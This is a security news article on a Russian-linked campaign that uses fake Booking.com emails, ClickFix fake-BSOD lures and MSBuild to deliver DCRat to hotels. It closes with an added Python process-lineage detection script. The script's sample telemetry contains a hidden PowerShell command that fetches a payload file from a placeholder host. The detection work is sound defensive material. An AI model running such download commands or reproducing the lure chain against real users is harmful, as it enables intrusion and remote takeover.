
Malware Campaign Abuses Booking.com Against Hospitality Sector

  • Jeffrey Burt--securityboulevard.com
  • published date: 2026-01-05 00:00:00 UTC


<p>An evolving multi-stage campaign, likely run by Russian threat actors, is using a fake Booking.com reservation-cancellation message for initial access against the hospitality industry during the busy holiday season.</p>
<p>According to a <a href="https://www.securonix.com/blog/analyzing-phaltblyx-how-fake-bsods-and-trusted-build-tools-are-used-to-construct-a-malware-infection/" target="_blank" rel="noopener">January 5 report from Securonix</a>, the attackers employ a <a href="https://securityboulevard.com/2025/11/attackers-are-using-fake-windows-updates-in-clickfix-scams/" target="_blank" rel="noopener">ClickFix social engineering technique</a> that includes a fake CAPTCHA, a fake Blue Screen of Death (BSOD) and several other steps before deploying a custom <a href="https://www.fortinet.com/blog/threat-research/dcrat-impersonating-the-columbian-government" target="_blank" rel="noopener">DCRat remote access trojan</a> payload, which gives the attackers remote access to the victim’s system and lets them deploy secondary payloads.</p>
<p>“Threat actors are targeting hospitality sectors during one of the busiest times of the year, this year’s holiday season,” researchers Shikha Sangwan, Akshay Gaikwad, and Aaron Beardslee wrote. “The attackers utilize booking.com, a theme that has been abused in the past and remains a persistent threat. The phishing emails notably feature room charge details in Euros, suggesting the campaign is actively targeting European organizations. The use of the Russian language within the ‘v.project’ [MSBuild] file links this activity to Russian threat factors using DCRat.”</p>
<p>They wrote that they traced the PHALT#BLYX campaign’s activity back several months and saw a “notable evolution” in the infection chain. Earlier samples relied on a less sophisticated delivery mechanism: HTML Application (.hta) files and the legitimate mshta.exe utility, which deployed remote payloads through embedded URLs. The method was effective but easily detected.</p>
<p>“The `.hta` and associated PowerShell scripts contained straightforward execution logic, typically a direct path to the RAT, which made them easy targets for antivirus vendors and automated security controls,” Sangwan, Gaikwad, and Beardslee wrote. “The shift to the current MSBuild-based chain represents a strategic pivot towards more evasive, ‘Living off the Land’ techniques to bypass these defenses.”</p>
<h3>Starts With Fake Booking.com Message</h3>
<p>The phishing message is made to look like a reservation cancellation from Booking.com. It shows a significant financial charge that the attackers hope creates enough urgency that the victim immediately investigates; clicking the “see details” button to verify the charge sends the user through a redirector to the malicious domain, where a fake page shows a CAPTCHA-style browser error.</p>
<p>The landing page mimics a legitimate Booking.com interface, with the right colors, logos and font styles, but carries a message reading “loading is taking too long” and a “refresh page” button.</p>
<p>“The fake error exploits this urgency, prompting them to click the ‘Refresh’ button without second-guessing its legitimacy,” the researchers wrote. “This click is the critical pivot point where the user transitions from a passive observer to an active participant in the compromise.”</p>
<p>The landing page is difficult for defenders to detect, bypasses most web filters, and is still live and accessible.</p>
<h3>Enter Blue Screen of Death</h3>
<p>Once the “refresh” button is clicked, a fraudulent Blue Screen of Death animation appears, ramping up the urgency and worry. Targets are told they can fix the problem by pasting a script into the Windows Run dialog.</p>
<p>That script executes a PowerShell command that downloads v.proj, an MSBuild project file; MSBuild.exe then compiles and runs the payload embedded in v.proj, the researchers wrote. The malware also disables Windows Defender to evade detection and establishes persistence through a “.url” file in the system’s Startup folder.</p>
<p>DCRat is then executed, connecting to the command-and-control (C2) server and injecting a secondary payload into “aspnet_compiler.exe.” The DCRat payload allows full remote control of the targeted system, enabling keylogging, command execution and the dropping of additional malware, and it injects malicious code into Windows processes to hide its activity.</p>
<h3>‘Sophisticated Evolution’</h3>
<p>“The PHALT#BLYX campaign represents a sophisticated evolution in commodity malware delivery, seamlessly blending high-pressure social engineering with advanced ‘Living off the Land’ techniques,” Sangwan, Gaikwad and Beardslee wrote. “The psychological manipulation, combined with the abuse of trusted system binaries like `MSBuild.exe`, allows the infection to establish a foothold deep within the victim’s system before traditional defenses can react. The technical complexity of the infection chain reveals a clear intent to evade detection and maintain long-term persistence.”</p>
<p>They added that while abusing the Booking.com brand is a known tactic, attackers traditionally compromised hotel accounts to message guests directly or sent phishing emails to hotel owners via fake inquiries. They also relied on direct malware links in the emails that led to file-sharing sites hosting infostealers such as <a href="https://securityboulevard.com/2024/06/exposing-the-cc-and-ioc-infrastructure-of-the-redline-stealer-malicious-software-an-analysis/" target="_blank" rel="noopener">RedLine</a>, <a href="https://securityboulevard.com/2024/06/stealc-vidar-malware-campaign-identified/" target="_blank" rel="noopener">Vidar</a>, or <a href="https://www.justice.gov/usao-wdtx/pr/us-joins-international-action-against-redline-and-meta-infostealers" target="_blank" rel="noopener">Meta Stealer</a>.</p>
<p>“While PHALT#BLYX shares the same target (hospitality) and attribution markers (Russian Threat actors), it represents a significant tactical shift in the delivery and trigger,” the researchers wrote.</p>
<h3>Likely a Russian Actor</h3>
<p>While the campaign, whose tools and language point to a Russian threat actor, currently targets the hospitality industry, it could be adapted to other sectors.</p>
<p>“As these tactics continue to evolve, organizations must look beyond file-based detection and focus on behavioral anomalies and process lineage to identify and stop these multi-staged attacks,” the researchers wrote.</p>
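<p>The researchers’ closing advice is to hunt on process lineage rather than file hashes. The following is an added example of what that looks like for the chain described in this article (Run dialog to PowerShell, PowerShell to MSBuild.exe building a project file, a payload injected into aspnet_compiler.exe, and a .url file dropped in the Startup folder). It is not Securonix’s or Security Boulevard’s code. The event records are constructed, Sysmon-style samples with made-up PIDs and paths; the rule names are this example’s own, and it assumes that the injection host appears as a child of the MSBuild.exe process, which the article does not state.</p>

```python
"""Process-lineage and persistence checks for a ClickFix -> PowerShell ->
MSBuild -> injected-process chain. Added educational example; the events,
PIDs, paths and rule names below are all constructed assumptions."""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # executable name, lower-cased
    cmdline: str


@dataclass
class FileEvent:
    pid: int        # process that wrote the file
    path: str


SHELLS = {"powershell.exe", "pwsh.exe"}
BUILD_TOOLS = {"msbuild.exe"}
INJECTION_HOSTS = {"aspnet_compiler.exe"}
STARTUP_DIR = "\\start menu\\programs\\startup\\"


def ancestry(pid: int, procs: Dict[int, ProcEvent]) -> List[str]:
    """Image names from pid up to the oldest known ancestor (pid itself first)."""
    chain: List[str] = []
    seen = set()
    while pid in procs and pid not in seen:   # `seen` guards against PID-reuse loops
        seen.add(pid)
        chain.append(procs[pid].image)
        pid = procs[pid].ppid
    return chain


def detect(proc_events: List[ProcEvent], file_events: List[FileEvent]) -> List[Tuple[str, int]]:
    """Return (rule_name, pid) pairs for events matching the chain's behaviours."""
    procs = {e.pid: e for e in proc_events}
    alerts: List[Tuple[str, int]] = []
    for e in proc_events:
        lineage = ancestry(e.pid, procs)
        parent: Optional[str] = lineage[1] if len(lineage) > 1 else None
        ancestors = set(lineage[1:])
        # Rule 1: a shell started by explorer.exe (the Run dialog's parent) whose
        # command line names a URL, i.e. the pasted ClickFix command firing.
        if e.image in SHELLS and parent == "explorer.exe" and "http" in e.cmdline.lower():
            alerts.append(("clickfix_shell_from_explorer", e.pid))
        # Rule 2: MSBuild launched by a scripting host rather than an IDE or build
        # agent; in this chain it compiles and runs the payload embedded in v.proj.
        if e.image in BUILD_TOOLS and parent in SHELLS:
            alerts.append(("msbuild_spawned_by_shell", e.pid))
        # Rule 3: the injection target whose lineage runs back through MSBuild to a
        # shell. The same binary under devenv.exe does not match (benign build).
        if e.image in INJECTION_HOSTS and ancestors & BUILD_TOOLS and ancestors & SHELLS:
            alerts.append(("injection_host_under_shell_lineage", e.pid))
    for f in file_events:
        # Rule 4: a .url shortcut written into a Startup folder (the persistence step).
        p = f.path.lower().replace("/", "\\")
        if p.endswith(".url") and STARTUP_DIR in p:
            alerts.append(("startup_url_persistence", f.pid))
    return alerts


# Constructed sample telemetry: one malicious chain (PIDs 2001-2003) and one
# benign Visual Studio build (PIDs 3001-3003) under the same explorer.exe.
SAMPLE_PROCS = [
    ProcEvent(1000, 1, "explorer.exe", "C:\\Windows\\explorer.exe"),
    ProcEvent(2001, 1000, "powershell.exe",
              'powershell -w hidden -c "iwr http://redirector.invalid/v.proj -OutFile $env:TEMP\\v.proj"'),
    ProcEvent(2002, 2001, "msbuild.exe", "MSBuild.exe C:\\Users\\guest\\AppData\\Local\\Temp\\v.proj"),
    ProcEvent(2003, 2002, "aspnet_compiler.exe", "aspnet_compiler.exe"),
    ProcEvent(3001, 1000, "devenv.exe", "devenv.exe C:\\src\\app.sln"),
    ProcEvent(3002, 3001, "msbuild.exe", "MSBuild.exe C:\\src\\app.csproj"),
    ProcEvent(3003, 3002, "aspnet_compiler.exe", "aspnet_compiler.exe -v / -p C:\\src\\web"),
]
SAMPLE_FILES = [
    FileEvent(2002, "C:\\Users\\guest\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\update.url"),
    FileEvent(3002, "C:\\src\\bin\\Debug\\app.dll"),
]


def run_demo() -> List[Tuple[str, int]]:
    """Run the rules over the constructed samples; expect four alerts, none benign."""
    return detect(SAMPLE_PROCS, SAMPLE_FILES)


if __name__ == "__main__":
    for rule, pid in run_demo():
        print(f"ALERT {rule}: pid {pid}")
```

<p>The point of the benign devenv.exe chain is that none of these binaries is suspicious on its own: MSBuild.exe and aspnet_compiler.exe appear constantly on developer workstations. Each rule keys on who launched the process and what launched that, which is what the researchers mean by process lineage, and that signal survives a new project-file name, a new redirector domain, or a repacked DCRat build.</p>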